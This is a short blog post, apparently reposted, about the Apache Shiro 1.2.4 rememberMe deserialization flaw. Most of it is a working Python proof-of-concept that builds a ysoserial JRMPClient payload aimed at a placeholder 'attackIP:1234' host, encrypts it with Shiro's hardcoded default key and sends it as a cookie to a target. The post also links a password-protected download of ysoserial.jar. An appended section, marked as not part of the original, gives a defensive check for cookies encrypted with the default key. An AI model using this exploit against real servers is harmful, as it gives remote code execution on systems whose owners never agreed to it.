
[Hands-on] Apache Shiro 1.2.4 RCE

Published: 2019-04-06 14:17:17


PoC:

# coding: utf-8
import os
import re
import sys
import base64
import uuid
import subprocess
import requests
from Crypto.Cipher import AES

JAR_FILE = "ysoserial.jar"

def attack(target, command):
    if not os.path.exists(JAR_FILE):
        raise Exception("jar file not found!")
    # Generate the serialized JRMPClient object with ysoserial
    popen = subprocess.Popen(["java", "-jar", JAR_FILE, "JRMPClient", command],
                             stdout=subprocess.PIPE)
    BS = AES.block_size
    # PKCS#7-style padding up to the AES block size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    # Default rememberMe key hardcoded in Shiro 1.2.4
    key = "kPH+bIxk5D2deZiIxcaaaA=="
    mode = AES.MODE_CBC
    iv = uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    # Cookie value is base64(IV + AES-CBC ciphertext)
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    print(base64_ciphertext)
    try:
        response = requests.get(target, timeout=20, cookies={"rememberMe": base64_ciphertext.decode()})
        print("Request to target URL success")
    except Exception as e:
        print("[x] Request to target URL fail! {}".format(e))

if __name__ == "__main__":
    url = sys.argv[1]
    attack(url, "attackIP:1234")

ysoserial.jar must be present in the current directory. Link: https://pan.baidu.com/s/1gdevU9QyguGSYr2ExBChqQ  Password: nsoi

Screenshot from the live test: [image]
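A defensive counterpart to the PoC above, added here and not part of the original article: it checks whether a rememberMe value taken from your own access logs or WAF captures decrypts under the Shiro 1.2.4 default key to a Java serialization stream. The function names are hypothetical, and AES-128 block decryption is written in pure Python (an assumption made so the check runs without pycryptodome); only the first CBC block is decrypted.

```python
import base64
from functools import reduce
from operator import xor

DEFAULT_KEY = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")  # Shiro 1.2.4 default, from the PoC
JAVA_SER_MAGIC = b"\xac\xed\x00\x05"  # first bytes of a Java serialization stream
RCON = (1, 2, 4, 8, 16, 32, 64, 128, 27, 54)  # AES-128 round constants
IMC = (14, 11, 13, 9)  # first row of the InvMixColumns matrix
CELLS = [(c, r) for c in range(4) for r in range(4)]  # state is column-major

def _gmul(a, b):  # multiply in GF(2^8) modulo x^8 + x^4 + x^3 + x + 1
    r = 0
    while b:
        r ^= a if b & 1 else 0
        a, b = (a << 1) ^ (0x11B if a & 0x80 else 0), b >> 1
    return r

_INV = [0] + [next(b for b in range(1, 256) if _gmul(a, b) == 1) for a in range(1, 256)]
SBOX = [reduce(xor, (((x << i) | (x >> (8 - i))) & 0xFF for i in range(5))) ^ 0x63 for x in _INV]
INV_SBOX = [SBOX.index(v) for v in range(256)]

def _round_keys(key):
    w = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    for i in range(4, 44):
        t = w[i - 1]
        if i % 4 == 0:  # RotWord, SubWord, Rcon
            t = [SBOX[b] for b in t[1:] + t[:1]]
            t[0] ^= RCON[i // 4 - 1]
        w.append([a ^ b for a, b in zip(w[i - 4], t)])
    return [sum(w[n * 4:n * 4 + 4], []) for n in range(11)]

def aes128_decrypt_block(key, block):
    rk = _round_keys(key)
    s = [b ^ k for b, k in zip(block, rk[10])]
    for rnd in range(9, -1, -1):  # InvShiftRows + InvSubBytes + AddRoundKey
        s = [INV_SBOX[s[(c - r) % 4 * 4 + r]] ^ rk[rnd][c * 4 + r] for c, r in CELLS]
        if rnd:  # InvMixColumns on every round except the last
            s = [reduce(xor, (_gmul(s[c * 4 + j], IMC[(j - r) % 4]) for j in range(4))) for c, r in CELLS]
    return bytes(s)

def uses_default_key(cookie_value):
    """True if a rememberMe value decrypts under DEFAULT_KEY to a Java object stream."""
    try:
        raw = base64.b64decode(cookie_value, validate=True)
    except ValueError:
        return False
    if len(raw) < 32 or len(raw) % 16:  # IV plus at least one whole block
        return False
    first = aes128_decrypt_block(DEFAULT_KEY, raw[16:32])
    return bytes(a ^ b for a, b in zip(first, raw[:4])) == JAVA_SER_MAGIC  # CBC: P1 = D(C1) xor IV
```

A hit on an inbound request means a client is sending objects encrypted with the publicly known key. A hit on a cookie your own application issued means it still runs with the default key and needs a unique rememberMe cipher key.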


Original article: https://www.cnblogs.com/peterpan0707007/p/10661500.html
